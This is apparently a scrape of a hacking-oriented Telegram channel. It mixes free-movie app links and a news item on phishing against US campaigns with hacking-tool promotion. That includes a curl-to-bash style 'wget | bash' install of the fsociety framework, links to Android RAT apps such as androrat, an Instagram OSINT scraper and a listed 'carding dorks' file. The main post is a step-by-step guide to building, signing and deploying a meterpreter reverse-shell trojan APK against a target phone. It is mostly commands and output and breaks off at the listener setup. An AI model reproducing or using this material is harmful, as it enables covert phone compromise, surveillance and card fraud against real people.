UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.2K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEST 2020 APPS FOR WATCH MOVIES FOR FREE ANDROID/IOS :

1) https://play.google.com/store/apps/details?id=com.tubitv&hl=en

https://itunes.apple.com/us/app/tubi-tv-stream-free-movies/id886445756

2) https://play.google.com/store/apps/details?id=com.curiousbrain.popcornflix

https://itunes.apple.com/us/app/popcornflix-free-movies/id493605531

3) https://play.google.com/store/apps/details?id=com.yidio.androidapp

https://itunes.apple.com/us/app/yidio/id664306931

4) https://play.google.com/store/apps/details?id=com.gotv.crackle.handset

https://itunes.apple.com/us/app/crackle-movies-tv/id377951542

5) https://play.google.com/store/apps/details?id=air.com.snagfilms

https://itunes.apple.com/us/app/snagfilms/id404906625

6) https://play.google.com/store/apps/details?id=tv.pluto.android

https://itunes.apple.com/us/app/pluto-tv/id751712884

7) https://play.google.com/store/apps/details?id=air.com.vudu.air.DownloaderTablet

https://itunes.apple.com/us/app/vudu-movies-tv/id487285735

8) https://play.google.com/store/apps/details?id=com.recipe.filmrise

https://apps.apple.com/us/app/filmrise/id1353108336

9) https://play.google.com/store/apps/details?id=com.plexapp.android

https://apps.apple.com/us/app/plex-movies-tv-music-more/id383457673

10) https://apps.apple.com/us/app/crackle-movies-tv/id377951542

https://play.google.com/store/apps/details?id=com.gotv.crackle.handset&hl=en_US

11) https://play.google.com/store/apps/details?id=tv.pluto.android&hl=en_US

https://apps.apple.com/us/app/pluto-tv-live-tv-and-movies/id751712884


@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Shell checker & full hacking tool -A Penetration Testing Framework


1) Information Gathering:

2) Password Attacks:

3)Wireless Testing:

4)Exploitation Tools

5) Sniffing & Spoofing:

6) Web Hacking:

Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework

7) Private Web Hacking:

8)Post Exploitation:

β’Ύβ“ƒβ“ˆβ“‰β’Άβ“β“β’Ύβ“ˆβ’Άβ“‰β’Ύβ“„β“ƒ & β“‡β“Šβ“ƒ :

A) termux and linux type :

( https://github.com/Manisso/fsociety)
>bash <(wget -qO- https://git.io/vAtmB)
B)Docker-compose

docker-compose build
docker-compose up -d
docker-compose exec fsociety fsociety
docker-compose down # destroys instance

c) for windows :

Download Linux Bash Like Cygwin

Download Python

Use Google Cloud Console Cloud Shell

Or Use Free Ubuntu VPS c9.io

βœ…

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Google says foreign hackers attacked emails of campaigners such as Trump and Biden :
> News

> Reuters reported that foreign hackers are attacking the emails of US presidential candidates, and the personal email accounts of current President Donald Trump and Democratic Party candidate Joe Biden are under threat. Analysts say that some hackers with senior backgrounds tried to target the staff of Biden's campaign team, while other so-called Iranian hackers aimed their eyes at the email accounts of Trump's campaign team staff.

>Google's threat analysis team leader Shane Huntley said in a tweet that the hacker had launched a phishing attempt on the US presidential candidate and showed no signs of ending it.

>A Google spokesperson also said in an interview with TheVerge that the company has not yet seen evidence that any attack has succeeded, so it has not passed relevant information to federal law enforcement officials.

> Even so, Google still encourages members of the campaign team to provide additional protection for their work and personal email accounts, such as two-step verification and the advanced security protection provided by Google.

written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEST ANDROID HACKING APPS 2020 :



1) DroidBox

https://downloadapks.net/app/droidbox-apk/

2) Kali Net Hunter

https://www.kali.org/kali-linux-nethunter/

3) Zanti

https://zanti.en.softonic.com/android

4) CSploit

http://www.csploit.org/downloads/

5) Hackod

https://apkpure.com/hackode/com.techfond.hackode

6) Network mapper

https://www.malavida.com/en/soft/network-mapper/android/#gref

7)androrat

https://www.apkfirm.com/androrat/

8) DroidSheep - Wi-Fi Kill -

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘From 8 days last update Information Gathering Instagram.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) $ pkg install -y git

2) $ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig

3) $ chmod +x install.sh && ./install.sh

β€’ Usage
4) $ python3 main.py -u username

5) $ python3 main.py -h

6) main.py [-h] -u USERNAME [-p] [-s]

optional arguments:

-h, --help show this help message and exit

-u USERNAME, --username USERNAME username of account to scan

-p, --postscrap scrape all uploaded images info

-s, --savedata save data to file ( save profile pic, info , post info )

βœ…

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
8k_carding_dorks__).txt
199.3 KB
2019-2020 lastest list
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Android Hacking Steps by undercode :
1. Create Payload

To create a trojan for hacking Android, we need to create a payload using the msfvenom utility in Kali Linux.

root @ destroyer: ~ # msfvenom -p android / meterpreter / reverse_tcp LHOST = 192.168.0.50 LPORT = 4444 R> /root/MyPath/my0704.apk
No platform was selected, choosing Msf :: Module :: Platform :: Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes


In the LHOST command above, IP is set, used in the ifconfig command from Kali Linux.

The above command creates a Trojan apk file that will be installed on the target phone for use, however before that we must sign this apk for proper installation. Follow the steps below the list for this.

and. Creating a keystore:

root @ destroyer: ~ # keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000


The above team asks questions and password.

b. Sign the created file using jarsigner apk.

root @ destroyer: ~ # jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/MyPath/my0704.apk app
Enter Passphrase for keystore:
adding: META-INF / APP.SF
adding: META-INF / APP.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
jar signed.

Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.


with. Check apk created with jarsigner.

root @ destroyer: ~ # jarsigner -verify -verbose -certs /root/MyPath/my0704.apk


e. File optimization with zipalign apk.

Before you begin, install zipalign using the command below:

apt-get install zipalign


Now let me optimize apk.

root @ destroyer: ~ # zipalign -v 4 /root/MyPath/my0704.apk /root/MyPath/my0704_sign.apk
Verifying alignment of /root/MyPath/my0704_sign.apk (4) ...
50 META-INF / MANIFEST.MF (OK - compressed)
281 META-INF / APP.SF (OK - compressed)
623 META-INF / APP.RSA (OK - compressed)
1752 META-INF / (OK)
1802 META-INF / SIGNFILE.SF (OK - compressed)
2087 META-INF / SIGNFILE.RSA (OK - compressed)
2750 classes.dex (OK - compressed)
8726 AndroidManifest.xml (OK - compressed)
10443 resources.arsc (OK - compressed)
Verification successful


Thus, our final apk, which we use to crack the android, is named as β€œmy0704_sign.apk”.

2. Run msfconsole on Kali Linux to operate the Android phone.

root @ destroyer: ~ # msfconsole

Call trans opt: received. 01-01-17 20:00:10 REC: Loc

Trace program: running

wake up, Neo ...
the matrix has you
follow the white rabbit.

knock, knock, Neo.

(`., -,
``. ,; ' /
`. , '/.'
`. X /. '
.-; --'' - .._ `` (
. ' / `
, `` Q '
,, `._ \
,. | '' -.; _ '
:. `; `` -, .._;
'',). '
`._, '/ _
; , '' - ,; ' `` -
`` -..__ `` --`

http://metasploit.com


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro - learn more on http://rapid7.com/metasploit

= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]

msf>


In the msf line above, launch the payload on android and exploit command multiboot using below:

msf> use exploit / multi / handler
msf exploit (handler)> set payload android / meterpreter / reverse_tcp
payload => android / meterpreter / reverse_tcp
msf exploit (handler)>


In the command below we use Kali Linux IP, can be taken using the ifconfig command on Kali Linux. In addition, we use port number 4444 for operation.